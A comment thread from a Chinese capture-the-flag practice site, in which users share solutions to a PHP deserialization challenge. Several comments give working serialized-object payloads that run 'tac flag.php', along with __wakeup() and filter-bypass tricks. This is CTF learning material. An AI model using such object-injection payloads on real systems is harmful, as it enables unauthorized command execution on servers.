评分(5)
解题动态
薄言. 攻破了该题 7小时前
谢特恒123 攻破了该题 12小时前
19553528229 攻破了该题 2天前
william5678 攻破了该题 6天前
dacming9527 攻破了该题 7天前
ggtom 攻破了该题 8天前
ziyou 攻破了该题 9天前
wjzkifaa 攻破了该题 9天前
hulihaha 攻破了该题 10天前
zhengjim 攻破了该题 10天前
baisui 攻破了该题 12天前
掘金 攻破了该题 13天前
027-王俊熙 攻破了该题 13天前
058-潘冰钰 攻破了该题 13天前
085-文睿 攻破了该题 13天前
gdrhdr 攻破了该题 14天前
汤布里伯 攻破了该题 16天前
wuyong5025 攻破了该题 17天前
Sonetto 攻破了该题 18天前
评论
谢特恒123 12小时前
举报
这个题本身不难,只要会序列化处理和几个魔术方法的原理就可以了,反撇号吗,有意思
kitniu 1月前
举报
1.查看源代码,base64解码;2.打开.bak文件,查看源代码;3.翻译代码,要求传入code参数,反序列化后传入ctf ,username admin cat tac flag.php
harry2025 5月前
举报
http://171.80.2.169:14918?code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
陈亮 5月前
举报
flag{***}
网恋秀牛子被录屏导致自卑 5月前
举报
执行命令时,我用的“cp flag.php flag.txt”绕过,这样的话就复制了文件,然后直接访问flag.txt就行,屏幕输出NULL是因为这个命令没有输出的,但执行了。
admit 9月前
举报
/?code=O:3:%22ctf%22:3:{s:11:%22%00*%00username%22;s:5:%22admin%22;s:6:%22%00*%00cmd%22;s:12:%22tac%20flag.php%22;}
iNMB 11月前
举报
此外必须用 %00(空字符),不能用 %20(空格)。 protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。 因此保护字段的字段名在序列化时,字段名前面会加上 \0*\0 的前缀,注意,这里的 \0 表示 ASCII 码为 0 的字符,也就是我们经过 urlencode 后看到的 %00 。
iNMB 11月前
举报
绕过__wakeup()后使用tac等其他输出字符的命令即可
llc123 1年前
举报
c\at flag.php也行
pezn1and 1年前
举报
code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}